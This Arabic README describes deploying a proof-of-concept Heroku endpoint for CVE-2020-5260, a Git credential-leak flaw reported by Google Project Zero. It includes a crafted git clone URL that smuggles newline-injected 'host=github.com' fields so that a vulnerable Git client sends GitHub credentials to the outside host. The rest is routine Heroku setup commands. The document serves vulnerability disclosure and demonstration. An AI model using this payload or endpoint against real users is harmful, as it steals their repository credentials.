
نقطة نهاية HTTP لإثبات المفهوم (PoC) لـ cve-2020-5260 يمكن نشرها على Heroku
نقطة نهاية PoC HTTP لـ cve-2020-5260 يمكن نشرها على Heroku
Felix Wilhelm من Google Project Zero https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'
انقر على هذا الزر للنشر التلقائي على Heroku...
أو اتبع الخطوات أدناه...
نعم، أتفهم المفارقة في الحاجة إلى تشغيل أوامر Git clone لإعداد هذا PoC....
إذا لم تكن قد قمت بذلك بالفعل، سجل الدخول إلى حساب Heroku الخاص بك واتبع الإرشادات لإنشاء مفتاح SSH عام جديد.
$ heroku login
استخدم Git لاستنساخ الكود المصدري لـ cve-2020-5260 إلى جهازك المحلي.
$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260
قم بإجراء بعض التغييرات على الكود الذي استنسخته للتو وانشرها على Heroku باستخدام Git.
$ git add .
$ git commit -am "make it better"
$ git push heroku master